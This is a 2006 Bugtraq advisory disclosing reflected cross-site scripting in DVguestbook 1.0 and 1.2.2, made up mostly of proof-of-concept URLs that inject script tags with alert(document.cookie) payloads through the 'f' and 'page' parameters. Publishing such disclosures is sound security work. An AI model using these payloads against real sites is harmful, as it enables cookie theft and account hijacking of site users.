Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs
DVguestbook 1.0 And 1.2.2 Cross Site Scripting Mar 09 2006 07:53PM
liz0 bsdmail com
------------------------------------------------------------------------
-------------
DVguestbook 1.0 And 1.2.2 Cross Site Scripting

Site:http://suprem.free.fr

Credit : Liz0ziM
webpage:www.biyosecurity.com
Mail :liz0 (at) bsdmail (dot) com [email concealed]

------------------------------------------------------------------------
-------------
DVguestbook 1.0 Xss

http://victim/path/dv_gbook.php?d=0&f='"><script>alert(document.cookie)<
/script>
http://victim/path/dv_gbook.php?d=0&f='"><script>alert(/BiyoSecurityTeam
/)</script>
http://victim/path/dv_gbook.php?d=0&f='"><script>alert(document.domain)<
/script>

DVguestbook 1.2.2 Xss

http://victim/path/index.php?page="><script>alert(document.cookie)</scri
pt>
http://victim/path/index.php?page="><script>alert(/Liz0ziM/)</script>
http://victim/path/index.php?page="><script>alert(document.domain)</scri
pt>
------------------------------------------------------------------------
----------------
Source:

http://www.blogcu.com/Liz0ziM/326668/
http://biyosecurity.be/bugs/dvguestbook.txt

[ reply ]




 

Privacy Statement
Copyright 2009, SecurityFocus